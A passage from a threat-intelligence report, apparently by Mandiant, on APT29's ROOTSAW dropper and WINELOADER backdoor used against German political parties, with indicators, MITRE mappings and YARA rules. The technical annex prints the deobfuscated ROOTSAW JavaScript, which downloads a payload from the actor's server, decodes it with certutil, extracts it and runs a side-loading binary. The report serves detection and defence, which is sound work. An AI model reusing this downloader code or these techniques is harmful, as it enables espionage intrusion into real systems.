        
      
        <figcaption class="article-image__caption "><p data-block-key="am9vg">Figure 2: Second CDU lure displayed by ROOTSAW downloader</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Outlook &amp; Implications</h2>
<p>ROOTSAW continues to be the central component of APT29’s initial access efforts to collect foreign political intelligence. The first-stage malware’s expanded use to target German political parties is a noted departure from the typical diplomatic focus of this APT29 subcluster, and almost certainly reflects the SVR’s interest in gleaning information from political parties and other aspects of civil society that could advance Moscow’s geopolitical interests. </p>
<p>As highlighted in our <a href="https://cloud.google.com/blog/topics/threat-intelligence/apt29-evolving-diplomatic-phishing" rel="noopener" target="_blank"><u>previous research</u></a> detailing APT29’s operations in the first-half of 2023, these malware delivery operations are highly adaptive, and continue to evolve in lockstep with Russia’s geopolitical realities. We therefore suspect that APT29’s interest in  these organizations is unlikely to be limited to Germany. Western political parties and their associated bodies from across the political spectrum are likely also possible targets for future SVR-linked cyber espionage activity given Moscow’s vital interest in understanding changing Western political dynamics related to Ukraine and other flashpoint foreign policy issues. </p>
<p>Based on recent activity from other APT29 subclusters, attempts to achieve initial access beyond phishing may include attempts to subvert cloud-based authentication mechanisms or brute force methods such as password spraying. For more details regarding APT29’s recent tactics, please see the February 2024 <a href="https://www.ncsc.gov.uk/news/svr-cyber-actors-adapt-tactics-for-initial-cloud-access" rel="noopener" target="_blank"><u>advisory</u></a> from the United Kingdom’s National Cyber Security Center (NCSC).</p>
<h2>Technical Annex</h2>
<h3>Initial Access</h3>
<p>Starting as early as 26 February 2024, APT29 distributed phishing attachments containing links to an actor-controlled compromise website, “waterforvoiceless[.]org/invite.php”, to redirect victims to a ROOTSAW dropper. This ROOTSAW variant uses the same <a href="https://github.com/javascript-obfuscator/javascript-obfuscator" rel="noopener" target="_blank"><u>JavaScript obfuscation resource </u></a>used in previous APT29 operations, and ultimately results in a request to download and execute the second stage WINELOADER from the same server at  “waterforvoiceless[.]org/util.php”. </p>
<p>The ROOTSAW payload contains a  JSObfuscated payload, that when parsed, results in the following code that is responsible for downloading a file to disk as “invite.txt”, decoding it using Windows Certutil, then decompressing the code using tar. Finally, the legitimate Windows binary (SqlDumper.exe) is executed by the actor.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>var a = new ActiveXObject("Wscript.Shell");
function Ijdaskjw(_0x559297) {
  var _0x3bd487 = new XMLHttpRequest();
  _0x3bd487.onreadystatechange = function () {
    if (_0x3bd487.readyState == 0x4 &amp;&amp; _0x3bd487.status == 0xc8) {
      var _0x11aa10 = _0x3bd487.response;
      var _0xce698d = new ActiveXObject("Scripting.FileSystemObject");
      var _0x20081c = _0xce698d.OpenTextFile("C:\\Windows\\Tasks
\\invite.txt", 0x2, true, 0x0);
      _0x20081c.Write(_0x11aa10);
      _0x20081c.close();
      a.Run("certutil -decode C:\\Windows\\Tasks\\invite.txt C:\\Windows
\\Tasks\\invite.zip", 0x0);
      var _0x245d53 = Date.now();
      var _0x3f9f72 = null;
      do {
        _0x3f9f72 = Date.now();
      } while (_0x3f9f72 - _0x245d53 &lt; 0xbb8);
      a.Run("tar -xf C:\\Windows\\Tasks\\invite.zip -C C:\\Windows\\Tasks
\\ ", 0x0);
      var _0x245d53 = Date.now();
      var _0x3f9f72 = null;
      do {
        _0x3f9f72 = Date.now();
      } while (_0x3f9f72 - _0x245d53 &lt; 0xdac);
      a.Run("C:\\Windows\\Tasks\\SqlDumper.exe", 0x0);
    }
  };
  _0x3bd487.open("GET", _0x559297, true);
  _0x3bd487.send(null);
}
Ijdaskjw("https://waterforvoiceless.org/util.php");
</code></pre></div>
<div class="block-paragraph_advanced"><ul>
<li>Invite.pdf (MD5: fb6323c19d3399ba94ecd391f7e35a9c)
<ul>
<li>Second CDU-themed PDF lure document</li>
<li>Written in LibreOffice 6.4 by default user “Writer”</li>
<li>Metadata documents the PDF as en-GB language</li>
<li>Links to https://waterforvoiceless[.]org/invite.php</li>
</ul>
</li>
<li>invite.php (MD5: 7a465344a58a6c67d5a733a815ef4cb7)
<ul>
<li>Zip file containing ROOTSAW</li>
<li>Downloaded from https://waterforvoiceless[.]org/invite.php</li>
<li>Executes efafcd00b9157b4146506bd381326f39</li>
</ul>
</li>
<li>invite.hta (MD5: efafcd00b9157b4146506bd381326f39)
<ul>
<li>ROOTSAW downloader containing obfuscated code</li>
<li>Downloads from https://waterforvoiceless[.]org/util.php</li>
<li>Extracts 44ce4b785d1795b71cee9f77db6ffe1b</li>
<li>Executes f32c04ad97fa25752f9488781853f0ea</li>
</ul>
</li>
<li>invite.txt (MD5: 44ce4b785d1795b71cee9f77db6ffe1b)
<ul>
<li>Malicious certificate file, extracted using Windows Certutil</li>
<li>Executed from efafcd00b9157b4146506bd381326f39</li>
<li>Downloaded from https://waterforvoiceless[.]org/util.php</li>
</ul>
</li>
<li>invite.zip (MD5: 5928907c41368d6e87dc3e4e4be30e42)
<ul>
<li>Malicious zip containing WINELOADER</li>
<li>Extracted from 44ce4b785d1795b71cee9f77db6ffe1b</li>
<li>Contains e017bfc36e387e8c3e7a338782805dde</li>
<li>Contains f32c04ad97fa25752f9488781853f0ea</li>
</ul>
</li>
<li>sqldumper.exe (MD5: f32c04ad97fa25752f9488781853f0ea)
<ul>
<li>Legitimate Microsoft file Sqldumper used for side loading</li>
</ul>
</li>
</ul>
<h3>Analysis of WINELOADER</h3>
<p>WINELOADER is likely a variant of the non-public historic BURNTBATTER and MUSKYBEAT code families which Mandiant uniquely associates with APT29. It shares a similar design and pattern, specifically around the invocation of the malware and the anti-analysis techniques used. However, the code family itself is considerably more customized than the previous variants, as it no longer uses publicly available loaders like DONUT or DAVESHELL and implements a unique C2 mechanism. Additionally, WINELOADER contains the following shared techniques with other code families used by APT29:</p>
<ul>
<li>The RC4 algorithm used to decrypt the next stage payload;</li>
<li>Process/DLL name check to validate the payload context (in use since early BEATDROP variants);</li>
<li>Ntdll usermode hook bypass (in use since early BEATDROP variants).</li>
</ul>
<p>WINELOADER is invoked via a DLL side loading technique into a legitimate Windows executable and starts to decrypt the main implant logic itself using RC4. This first layer of deobfuscation was first witnessed in the MUSKYBEAT/BURNTBATTER malware families and was originally used to decrypt a second file also stored in the zip file. Within WINELOADER, it is used to decrypt a region of memory containing the actual WINELOADER module. This module is a compiled position independent shellcode which contains references within itself to strings and decryption modules. </p>
<p>The decryption function then moves execution to this position independent shellcode. <a href="https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader" rel="noopener" target="_blank"><u>ZScaler</u></a> refers to this resource as the WINELOADER core module, and notes that it contains settings (C2 information, RC4 decryption keys) and strings. Based on samples identified by Mandiant, the WINELOADER resource contains 70 encrypted strings and both samples have the default sleep timer of 2 seconds configured.</p>
<p>WINELOADER communicates using HTTP GET requests using a user agent contained within the resource. Each packet to the C2 server contains a random size registration packet, this packet contains environment information like the victim’s username/device name, the process name and some information that could be used by the actor to determine whether the compromised system is a valid target (parent process path, etc.). The response from the C2 server can task the WINELOADER to execute a new module (either within the same process, or via process injection) and to update the sleep timer. </p>
<p>Although Mandiant was unable to obtain commands from the actor, ZScaler reported that they were able to receive a command to persist WINELOADER which resulted in a run key to be configured on the device. </p>
<ul>
<li>vcruntime140.dll (MD5: 8bd528d2b828c9289d9063eba2dc6aa0)
<ul>
<li>WINELOADER downloader</li>
<li>Communicates to https://siestakeying[.]com/auth.php</li>
</ul>
</li>
<li>Vcruntime140.dll (MD5: e017bfc36e387e8c3e7a338782805dde)
<ul>
<li>WINELOADER downloader </li>
<li>Communicates to https://siestakeying[.]com/auth.php</li>
</ul>
</li>
</ul>
<h3><span>MITRE ATT&amp;CK Techniques</span></h3>
<div align="left">
<div>
<div>
<div>
<div>
<div><table><colgroup></colgroup>
<tbody>
<tr>
<td>
<p><strong><span>ID</span></strong></p>
</td>
<td>
<p><strong><span>Technique</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://attack.mitre.org/techniques/T1543/003" rel="noopener" target="_blank"><span>T1543.003</span></a></p>
</td>
<td>
<p><span>Windows Service</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://attack.mitre.org/techniques/T1012" rel="noopener" target="_blank"><span>T1012</span></a></p>
</td>
<td>
<p><span>Query Registry</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://attack.mitre.org/techniques/T1082" rel="noopener" target="_blank"><span>T1082</span></a></p>
</td>
<td>
<p><span>System Information Discovery</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://attack.mitre.org/techniques/T1134" rel="noopener" target="_blank"><span>T1134</span></a></p>
</td>
<td>
<p><span>Access Token Manipulation</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://attack.mitre.org/techniques/T1057" rel="noopener" target="_blank"><span>T1057</span></a></p>
</td>
<td>
<p><span>Process Discovery</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://attack.mitre.org/techniques/T1007" rel="noopener" target="_blank"><span>T1007</span></a></p>
</td>
<td>
<p><span>System Service Discovery</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://attack.mitre.org/techniques/T1027" rel="noopener" target="_blank"><span>T1027</span></a></p>
</td>
<td>
<p><span>Obfuscated Files or Information</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://attack.mitre.org/techniques/T1070/004" rel="noopener" target="_blank"><span>T1070.004</span></a></p>
</td>
<td>
<p><span>File Deletion</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://attack.mitre.org/techniques/T1055/003" rel="noopener" target="_blank"><span>T1055.003</span></a></p>
</td>
<td>
<p><span>Thread Execution Hijacking</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://attack.mitre.org/techniques/T1083" rel="noopener" target="_blank"><span>T1083</span></a></p>
</td>
<td>
<p><span>File and Directory Discovery</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
<h3><span>Detections</span></h3></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Dropper_Rootsaw_Obfuscated
{
    meta:
        author = "Mandiant"
        disclaimer = "This rule is meant for hunting 
and is not tested to run in a production environment."
        description = "Detects obfuscated ROOTSAW payloads"

    strings:
        $ = "function _"
        $ = "new XMLHttpRequest();"
        $ = "'\\x2e\\x7a\\x69\\x70'"
        $ = "'\\x4f\\x70\\x65\\x6e'"
        $ = "\\x43\\x3a\\x5c\\x57"

    condition: 
        all of them
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Downloader_WINELOADER_1
{
    meta:
        author = "Mandiant"
        disclaimer = "This rule is meant for hunting and 
is not tested to run in a production environment."
        description = "Detects rc4 decryption logic in 
WINELOADER samples"

    strings:
        $ = {B9 00 01 00 00 99 F7 F9 8B 44 24 [50-200] 
0F B6 00 3D FF 00 00 00} // Key initialization
        $ = {0F B6 00 3D FF 00 00 00} // Key size

    condition:
        all of them

}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Downloader_WINELOADER_2
{
    meta:
        author = "Mandiant"
        disclaimer = "This rule is meant for hunting and 
is not tested to run in a production environment."
        description = "Detects payload invocation stub 
in WINELOADER"

    strings:
        // 48 8D 0D ?? ?? 00 00  lea rcx, module_start 
(Pointer to encrypted resource)
        // 48 C7 C2 ?? ?? 00 00  mov rdx, ???? (size of encrypted source)
        // E8 [4]  call decryption
        // 48 8D 05 [4]  lea rcx, ??
        // 48 8D 0D [4]  lea rax, module_start (decrypted resource)
        // 48 89 05 [4]  mov ptr_mod, rax
        //
        $ = {48 8D 0D ?? ?? 00 00 48 C7 C2 ?? ?? 00 00 E8 [4] 
48 8d 0D [4] 48 8D 05 [4] 48 89 05 }

    condition:
        all of them
}
</code></pre></div>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,19ms -->